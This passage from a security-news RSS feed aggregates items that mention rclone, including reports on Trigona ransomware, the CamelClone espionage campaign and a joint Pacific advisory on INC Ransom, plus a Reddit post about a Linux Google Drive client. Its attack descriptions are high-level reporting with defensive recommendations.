<description><![CDATA[Ransomware operators introduced a custom-built data exfiltration tool, signaling a notable evolution in attack techniques. Unlike most ransomware groups that rely on publicly available utilities such as Rclone or MegaSync, Trigona affiliates are now using a proprietary tool to steal sensitive dat...]]></description>
<link>https://tsecurity.de/de/3460117/it-security-nachrichten/ransomware-gang-unveils-custom-data-theft-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460117/it-security-nachrichten/ransomware-gang-unveils-custom-data-theft-tool/</guid>
<pubDate>Fri, 24 Apr 2026 07:06:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ransomware operators introduced a custom-built data exfiltration tool, signaling a notable evolution in attack techniques. Unlike most ransomware groups that rely on publicly available utilities such as Rclone or MegaSync, Trigona affiliates are now using a proprietary tool to steal sensitive data with greater precision and stealth. Trigona, active since late 2022, operates as a […]</p>
<p>The post <a href="https://gbhackers.com/custom-data-theft-tool/">Ransomware Gang Unveils Custom Data-Theft Tool</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware Gang Unveils Custom Data-Theft Tool]]></title>
<description><![CDATA[Ransomware operators introduced a custom-built data exfiltration tool, signaling a notable evolution in attack techniques. Unlike most ransomware groups that rely on publicly available utilities such as Rclone or MegaSync, Trigona affiliates are now using a proprietary tool to steal…
Read more →
...]]></description>
<link>https://tsecurity.de/de/3460109/it-security-nachrichten/ransomware-gang-unveils-custom-data-theft-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460109/it-security-nachrichten/ransomware-gang-unveils-custom-data-theft-tool/</guid>
<pubDate>Fri, 24 Apr 2026 07:05:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ransomware operators introduced a custom-built data exfiltration tool, signaling a notable evolution in attack techniques. Unlike most ransomware groups that rely on publicly available utilities such as Rclone or MegaSync, Trigona affiliates are now using a proprietary tool to steal…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ransomware-gang-unveils-custom-data-theft-tool/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ransomware-gang-unveils-custom-data-theft-tool/">Ransomware Gang Unveils Custom Data-Theft Tool</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] rclone: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in rclone ausnutzen, um Sicherheitsvorkehrungen zu umgehen und beliebigen Programmcode auszuführen.]]></description>
<link>https://tsecurity.de/de/3448015/it-security-nachrichten/neu-hoch-rclone-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3448015/it-security-nachrichten/neu-hoch-rclone-mehrere-schwachstellen/</guid>
<pubDate>Mon, 20 Apr 2026 12:51:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in rclone ausnutzen, um Sicherheitsvorkehrungen zu umgehen und beliebigen Programmcode auszuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp, golang, and ncurses), Debian (asterisk, bind9, gst-plugins-base1.0, gst-plugins-ugly1.0, gvfs, incus, libxml-parser-perl, nodejs, php-phpseclib, php-phpseclib3, phpseclib, and strongswan), Fedora (bcftools, bind, bind-dyndb-ldap, chromium, ...]]></description>
<link>https://tsecurity.de/de/3393152/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393152/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 30 Mar 2026 15:11:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp, golang, and ncurses), <b>Debian</b> (asterisk, bind9, gst-plugins-base1.0, gst-plugins-ugly1.0, gvfs, incus, libxml-parser-perl, nodejs, php-phpseclib, php-phpseclib3, phpseclib, and strongswan), <b>Fedora</b> (bcftools, bind, bind-dyndb-ldap, chromium, dotnet10.0, dotnet8.0, dotnet9.0, giflib, htslib, libsoup3, libtasn1, maturin, mingw-expat, mingw-freetype, mongo-c-driver, perl-XML-Parser, php-phpseclib, php-phpseclib3, pypy, pypy3.10, pypy3.11, python-cryptography, python-fastar, python-ply, python-pycparser, python-uv-build, python3.11, python3.12, python3.13, python3.6, roundcubemail, rubygem-json, rust-ambient-id, rust-astral-reqwest-middleware, rust-astral-reqwest-retry, rust-astral-tokio-tar, rust-astral_async_http_range_reader, rust-cargo-c, rust-ingredients, rust-native-tls, rust-nix, rust-openssl-probe, rust-openssl-probe0.1, rust-pty-process, rust-reqsign, rust-reqsign-aliyun-oss, rust-reqsign-aws-v4, rust-reqsign-azure-storage, rust-reqsign-command-execute-tokio, rust-reqsign-core, rust-reqsign-file-read-tokio, rust-reqsign-google, rust-reqsign-http-send-reqwest, rust-reqsign-huaweicloud-obs, rust-reqsign-tencent-cos, rust-rustls-native-certs, rust-sequoia-chameleon-gnupg, rust-tar, rust-webpki-root-certs, rustup, samtools, suricata, uv, and vim), <b>Mageia</b> (cmake, libpng, nodejs, python-ujson, and strongswan), <b>Red Hat</b> (python3 and python3.9), <b>SUSE</b> (389-ds, amazon-cloudwatch-agent, capstone, chromium, containerd, cosign, curl, docker-compose, docker-stable, exiv2, expat, firefox, freeipmi, freerdp, gimp, glusterfs, govulncheck-vulndb, gstreamer-plugins-ugly, jupyter-bqplot-jupyterlab, jupyter-jupyterlab-templates, jupyter-matplotlib, kea, kernel, libsodium, libtpms-devel, LibVNCServer, nghttp2, nginx, poppler, python-dynaconf, python-ldap, python-nltk, python-orjson, python-pyasn1, python-pydicom, python-PyJWT, python-pyopenssl, python-tornado6, python311, python311-cbor2, python311-deepdiff, python311-intake, python311-jsonpath-ng, python311-lmdb, python311-oci-sdk, python312, rclone, redis, salt, tomcat11, v2ray-core, and vim), and <b>Ubuntu</b> (linux-ibm-5.4).]]></content:encoded>
</item>
<item>
<title><![CDATA[I built a full Google Drive client for Linux using rclone: systemd services, bi-directional sync, conflict resolution, and a KDE Dolphin overlay plugin]]></title>
<description><![CDATA[Google Drive Desktop doesn't exist for Linux. The usual workarounds are either a bare rclone mount command you have to restart manually, or a paid app like InSync. I wanted something closer to what macOS and Windows users get natively, so I built it. Note: version shows vdev when running from sou...]]></description>
<link>https://tsecurity.de/de/3378549/linux-tipps/i-built-a-full-google-drive-client-for-linux-using-rclone-systemd-services-bi-directional-sync-conflict-resolution-and-a-kde-dolphin-overlay-plugin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3378549/linux-tipps/i-built-a-full-google-drive-client-for-linux-using-rclone-systemd-services-bi-directional-sync-conflict-resolution-and-a-kde-dolphin-overlay-plugin/</guid>
<pubDate>Wed, 25 Mar 2026 02:53:11 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Google Drive Desktop doesn't exist for Linux. The usual workarounds are either a bare <code>rclone mount</code> command you have to restart manually, or a paid app like InSync. I wanted something closer to what macOS and Windows users get natively, so I built it.</p> <p><a href="https://preview.redd.it/mwsbkintczqg1.png?width=464&amp;format=png&amp;auto=webp&amp;s=904ccd51f9079600d6101c2dceda05d993f195c2">Note: version shows vdev when running from source, released builds display the actual version number</a></p> <p><strong>What it does</strong></p> <ul> <li>All Drive files appear instantly in your file manager regardless of Drive size, files download only when you open them</li> <li>Local saves upload to Drive in the background</li> <li>Bi-directional folder sync (Documents, Pictures, Desktop, etc.) to Drive under <code>MyComputers/[hostname]/</code> , shows up in the Drive web UI exactly like Google Drive Desktop's Backup and Sync</li> <li>Conflict copies created automatically when the same file is edited on two devices simultaneously, named in Google Drive's own format (<code>report (conflict copy 2024-01-15 14:32 myhostname).txt</code>)</li> <li>Desktop notifications for errors, auth expiry, rate limits, and upload completions</li> <li>Everything starts on login and survives reboots via systemd user services</li> <li>Multi-drive support, personal + work Drive with isolated services and ports</li> </ul> <p><strong>The KDE part</strong></p> <p>If you use Dolphin, there's an optional C++ plugin that adds per-file sync status overlays directly in the file manager, green checkmark for synced, arrow for pending upload, red X for conflict. It reads local cache metadata and the conflict manifest only, zero API calls, no performance impact. Works with both KF5 and KF6.</p> <p><strong>Installation</strong></p> <pre><code>git clone https://github.com/AndreaCovelli/rclone-gdrive-setup.git cd rclone-gdrive-setup ./install.sh gdrive </code></pre> <p>The installer walks you through rclone config if you haven't set it up yet, installs and enables all services, and optionally runs the folder sync setup wizard.</p> <p><strong>Tech stack</strong></p> <ul> <li>rclone VFS mount with on-demand download</li> <li>Four coordinated systemd user services per remote</li> <li>Python daemon for conflict detection (MD5 manifest + bisync conflict markers)</li> <li>Python daemon for bi-directional folder sync via <code>rclone bisync</code></li> <li>C++ KDE plugin for Dolphin overlay icons</li> <li>inotifywait for near-realtime local→cloud propagation (~3s debounce)</li> </ul> <p><strong>Honest limitations</strong></p> <ul> <li>Ubuntu/Debian only for the installer (the scripts themselves work anywhere rclone does)</li> <li>Cloud→local changes take up to 30s to appear (rclone poll interval), Google Drive Desktop is faster here</li> <li>The Dolphin plugin is KDE only, no GNOME/Nautilus equivalent yet</li> <li>Requires Python 3.8+ and rclone</li> <li>Full roadmap and architecture notes in <a href="https://github.com/AndreaCovelli/rclone-gdrive-setup/blob/main/CONTRIBUTING.md">CONTRIBUTING.md</a>.</li> </ul> <p><strong>License:</strong> MIT</p> <p>Repo: <a href="https://github.com/AndreaCovelli/rclone-gdrive-setup">github.com/AndreaCovelli/rclone-gdrive-setup</a></p> <p>Happy to answer questions about the implementation here. For bugs or installation issues, GitHub issues are the best place so others can find the answers too.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/AndJ_"> /u/AndJ_ </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1s2birt/i_built_a_full_google_drive_client_for_linux/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1s2birt/i_built_a_full_google_drive_client_for_linux/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Government Entities Targeted By CamelClone Espionage Campaign Using Rclone and Public Hosting Sites]]></title>
<description><![CDATA[Security researchers at Seqrite Labs have uncovered a sophisticated espionage campaign, dubbed Operation CamelClone, that targets critical government and defense entities worldwide. This newly identified operation focuses on nations with significant geopolitical importance, specifically Algeria, ...]]></description>
<link>https://tsecurity.de/de/3354445/it-security-nachrichten/government-entities-targeted-by-camelclone-espionage-campaign-using-rclone-and-public-hosting-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3354445/it-security-nachrichten/government-entities-targeted-by-camelclone-espionage-campaign-using-rclone-and-public-hosting-sites/</guid>
<pubDate>Tue, 17 Mar 2026 08:05:48 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security researchers at Seqrite Labs have uncovered a sophisticated espionage campaign, dubbed Operation CamelClone, that targets critical government and defense entities worldwide. This newly identified operation focuses on nations with significant geopolitical importance, specifically Algeria, Mongolia, Ukraine, and Kuwait. By utilizing socially engineered decoy documents, the threat actors aim to steal sensitive intelligence from military […]</p>
<p>The post <a href="https://cyberpress.org/camelclone-hits-governments/">Government Entities Targeted By CamelClone Espionage Campaign Using Rclone and Public Hosting Sites</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CamelClone Spy Campaign Abuses Public File-Sharing Sites and Rclone in Government-Focused Attacks]]></title>
<description><![CDATA[A sophisticated espionage campaign, tracked as Operation CamelClone, has been actively targeting government agencies, defense institutions, and diplomatic bodies across multiple countries, including Algeria, Mongolia, Ukraine, and Kuwait. The operation relies on spear-phishing emails carrying mal...]]></description>
<link>https://tsecurity.de/de/3354045/it-security-nachrichten/camelclone-spy-campaign-abuses-public-file-sharing-sites-and-rclone-in-government-focused-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3354045/it-security-nachrichten/camelclone-spy-campaign-abuses-public-file-sharing-sites-and-rclone-in-government-focused-attacks/</guid>
<pubDate>Tue, 17 Mar 2026 02:03:53 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated espionage campaign, tracked as Operation CamelClone, has been actively targeting government agencies, defense institutions, and diplomatic bodies across multiple countries, including Algeria, Mongolia, Ukraine, and Kuwait. The operation relies on spear-phishing emails carrying malicious ZIP archives disguised as…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/camelclone-spy-campaign-abuses-public-file-sharing-sites-and-rclone-in-government-focused-attacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/camelclone-spy-campaign-abuses-public-file-sharing-sites-and-rclone-in-government-focused-attacks/">CamelClone Spy Campaign Abuses Public File-Sharing Sites and Rclone in Government-Focused Attacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CamelClone Spy Campaign Abuses Public File-Sharing Sites and Rclone in Government-Focused Attacks]]></title>
<description><![CDATA[A sophisticated espionage campaign, tracked as Operation CamelClone, has been actively targeting government agencies, defense institutions, and diplomatic bodies across multiple countries, including Algeria, Mongolia, Ukraine, and Kuwait. The operation relies on spear-phishing emails carrying mal...]]></description>
<link>https://tsecurity.de/de/3354033/it-security-nachrichten/camelclone-spy-campaign-abuses-public-file-sharing-sites-and-rclone-in-government-focused-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3354033/it-security-nachrichten/camelclone-spy-campaign-abuses-public-file-sharing-sites-and-rclone-in-government-focused-attacks/</guid>
<pubDate>Tue, 17 Mar 2026 01:36:04 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated espionage campaign, tracked as Operation CamelClone, has been actively targeting government agencies, defense institutions, and diplomatic bodies across multiple countries, including Algeria, Mongolia, Ukraine, and Kuwait. The operation relies on spear-phishing emails carrying malicious ZIP archives disguised as official government correspondence, tricking recipients into triggering a multi-stage infection chain that ultimately leads to […]</p>
<p>The post <a href="https://cybersecuritynews.com/camelclone-spy-campaign/">CamelClone Spy Campaign Abuses Public File-Sharing Sites and Rclone in Government-Focused Attacks</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Australia, New Zealand, Tonga, Warn of Rising INC Ransom Attacks Targeting Pacific Networks]]></title>
<description><![CDATA[Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom's expanding activities and the growing influence of its affiliate network.


A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Tea...]]></description>
<link>https://tsecurity.de/de/3347465/it-security-nachrichten/australia-new-zealand-tonga-warn-of-rising-inc-ransom-attacks-targeting-pacific-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3347465/it-security-nachrichten/australia-new-zealand-tonga-warn-of-rising-inc-ransom-attacks-targeting-pacific-networks/</guid>
<pubDate>Fri, 13 Mar 2026 15:22:05 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="800" height="400" src="https://cyble.com/wp-content/uploads/2026/03/INC-Ransom.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="INC Ransom" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/03/INC-Ransom.webp 800w, https://cyble.com/wp-content/uploads/2026/03/INC-Ransom-300x150.webp 300w, https://cyble.com/wp-content/uploads/2026/03/INC-Ransom-768x384.webp 768w, https://cyble.com/wp-content/uploads/2026/03/INC-Ransom-600x300.webp 600w" sizes="(max-width: 800px) 100vw, 800px" title="Australia, New Zealand, Tonga, Warn of Rising INC Ransom Attacks Targeting Pacific Networks 2"></p>
<p><!-- wp:paragraph --></p>
<p>Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom's expanding activities and the growing influence of its affiliate network.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Team Tonga (CERT Tonga), and the New Zealand National Cyber Security Centre (NCSC) highlights how the INC Ransom ecosystem has become an active threat to organizations in Australia, New Zealand, and Pacific Island states.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The advisory from the agencies down under is designed for both technical specialists and general network defenders. It outlines how INC Ransom operates, the techniques its affiliates use, and the steps organizations can take to reduce their exposure. Officials from the three agencies are urging both government ministries and private organizations to review the mitigation measures outlined in the guidance to strengthen defenses against INC Ransom activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>What distinguishes this campaign is not only the <a href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noreferrer noopener">ransomware</a> itself, but the operational structure behind it. The INC Ransom ecosystem relies on a distributed affiliate model, enabling a broad range of cybercriminal operators to conduct attacks using shared tools and infrastructure.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>The INC Ransom Affiliate Model and the RaaS Ecosystem</strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The operational structure of INC Ransom, which functions as a Ransomware-as-a-Service (RaaS) platform. The model allows external affiliates to deploy ransomware against victims while the core operators manage extortion negotiations and payment collection. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>INC Ransom first emerged in mid-2023 as a financially motivated cybercriminal group believed to be based in Russia. Since then, the group has built an affiliate network that distributes ransomware to attackers targeting organizations worldwide. Within this structure, affiliates perform the technical intrusion and deployment of the <a href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noreferrer noopener">malware</a>, while the core INC Ransom operators handle victim communication and ransom demands. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The group is also known by other threat-intelligence labels, including Tarnished Scorpion and GOLD IONIC. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>According to the advisory from ACSC, NCSC, and CERT Tonga, INC Ransom operations are particularly focused on organizations that manage sensitive or high-value information. Health care providers have become a prominent target globally, likely due to the operational pressure these organizations face when systems become unavailable. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Although earlier activity concentrated on victims in the United States and the United Kingdom, <a href="https://cyble.com/en-au/cyber-threat-intelligence-solution-for-australia/" target="_blank" rel="noreferrer noopener">threat intelligence</a> collected by ACSC, NCSC, and CERT Tonga indicates that the group has shifted attention toward the Pacific region since early 2025. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>INC Ransom Incidents in Australia</strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>In Australia, ACSC has tracked a series of incidents linked to INC Ransom affiliates. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Between 1 July 2024 and 31 December 2025, the ACSC responded to 11 incidents attributed to the ransomware operation. These incidents primarily affected organizations in professional services and the health care sector. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Since January 2025, analysts at the ACSC have observed INC Ransom affiliates targeting <a href="https://cyble.com/blog/australia-health-cyber-sharing-network/" target="_blank" rel="noreferrer noopener">Australian health care</a> entities through compromised user accounts. Once access is obtained, attackers typically escalate privileges by creating new administrator-level accounts. They then move laterally through internal systems to expand control within the network. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During these operations, INC Ransom affiliates have deployed malicious payloads using filenames such as “win.exe.” Investigations conducted by the ACSC have also identified cases in which attackers exfiltrated personally identifiable information and medical records before launching the encryption phase. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Victims typically discover ransom notes containing instructions and links to the INC Ransom Tor-based data leak site (DLS) where negotiations occur. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Health Infrastructure Disruption in Tonga</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>One of the most disruptive incidents linked to INC Ransom occurred in the Kingdom of Tonga. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>On 15 June 2025, the ICT environment of the Tongan Ministry of Health was hit by a ransomware attack that disrupted the national health care network and rendered several core services inaccessible. Investigators from CERT Tonga, working with regional partners including ACSC and NCSC, discovered a ransom note associated with INC Ransom embedded within the ministry’s file systems. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>On 26 June 2025, the INC Ransom group publicly claimed responsibility for the incident on its <a href="https://cyble.com/knowledge-hub/what-is-the-dark-web/" target="_blank" rel="noreferrer noopener">dark-web</a> data leak site. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The advisory further identifies Roman Khubov, a cybercriminal also known as “blackod,” as the individual controlling the malicious infrastructure used to exfiltrate data during the Ministry of Health breach. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Ransomware Incident in New Zealand</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Ransomware activity remains a persistent problem in New Zealand, where multiple sectors of the economy have experienced disruptions. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In May 2025, the NCSC received a report from a health-sector organization that had suffered a major ransomware intrusion. According to the notification, attackers encrypted a large number of servers and endpoint devices while also stealing significant volumes of data. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The NCSC investigation determined that INC Ransom was responsible for the incident. After the organization refused to meet the extortion demand, the attackers published the stolen dataset on the INC Ransom data leak site. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The event reinforced concerns among cybersecurity officials at NCSC, ACSC, and CERT Tonga that the group’s tactics are targeting organizations whose operations are highly sensitive to disruption. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Technical Tactics Used by INC Ransom</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Technical analysis from ACSC, NCSC, and CERT Tonga shows that INC Ransom affiliates rely on several common intrusion techniques to gain initial access to victim networks. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The most frequently observed entry points include: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Spear-phishing campaigns targeting employees </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Exploitation of unpatched internet-facing systems </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Purchased credentials from initial access brokers </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>Once inside the network, INC Ransom affiliates often rely on legitimate software tools rather than custom malware to perform key tasks. This tactic allows malicious activity to blend into normal administrative operations. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For example: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>7-Zip and WinRAR are used to compress data before theft. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>The file synchronization tool rclone is frequently used to transfer stolen data outside the network. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>After data exfiltration, attackers deploy the encryption component of INC Ransom. A ransom note is then left on affected systems with payment instructions and contact details. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If the targeted organization refuses to pay, INC Ransom operators initiate double-extortion tactics by publishing both the victim’s name and stolen information on the group’s leak site. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Security analysts note that the tactics, techniques, and procedures (TTPs) used by INC Ransom share similarities with other ransomware operations such as Lynx, Nemty, Nemty X, Karma, and Nokoyawa. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Defensive Measures Recommended by ACSC, NCSC, and CERT Tonga</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The joint advisory from ACSC, NCSC, and CERT Tonga outlines several practical security measures designed to reduce the risk of INC Ransom compromise. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Key defensive actions include: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Maintain Reliable Backups:</strong> Organizations should maintain regular, tested backups of critical systems and store them securely to prevent unauthorized modification or deletion. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Restrict Network Traffic:</strong> Network administrators should limit inbound and outbound traffic to only what is necessary for operations. Firewalls and filtering technologies can help reduce exposure to <a href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noreferrer noopener">phishing</a> campaigns and malicious attachments. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Harden Remote Access:</strong> Virtual private networks (VPNs) and other remote access systems should be carefully configured to ensure only authorized users can reach sensitive resources. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Implement Multi-Factor Authentication:</strong> The advisory from ACSC, NCSC, and CERT Tonga emphasizes implementing phishing-resistant <a href="https://cyble.com/blog/multi-factor-authentication-mfa-is-a-part-of-your-cyber-hygiene/" target="_blank" rel="noreferrer noopener">multi-factor authentication</a> (MFA) for internet-facing services and privileged accounts. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Manage Privileged Access:</strong> Administrative privileges should be tightly controlled. Unique accounts for administrators improve accountability and reduce the impact of credential compromise. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Maintain Strong Vulnerability Management:</strong> Regular vulnerability scanning and rapid patching of exposed systems remain critical, particularly for internet-facing services that ransomware actors commonly target. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Growing Regional Collaboration Against the INC Ransom</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The joint advisory reflects cooperation among cybersecurity agencies across the Pacific. By sharing intelligence and incident data, organizations such as ACSC, NCSC, and CERT Tonga are building a more coordinated response to ransomware threats like INC Ransom. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The rise of affiliate-driven ransomware operations has significantly lowered the barrier to entry for cybercriminal activity. In this environment, the INC Ransom ecosystem demonstrates how distributed attacker networks can rapidly shift focus across geographic regions. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For organizations in Australia, New Zealand, and the Pacific islands, the advisory from the Australian Cyber Security Centre (ACSC), New Zealand National Cyber Security Centre (NCSC), and National Computer Emergency Response Team Tonga (CERT Tonga) highlights the need to strengthen access controls, monitor network activity, and maintain a tested <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" title="What is Incident Response?" data-wpil-keyword-link="linked" data-wpil-monitor-id="29206">incident response plan</a> to limit the impact of ransomware attacks. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Threat intelligence from Cyble helps organizations track ransomware activity, monitor <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-the-dark-web/" target="_blank" rel="noopener" title="What is the Dark Web? 2026" data-wpil-keyword-link="linked" data-wpil-monitor-id="29208">dark web</a> exposure, and identify indicators of compromise earlier. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
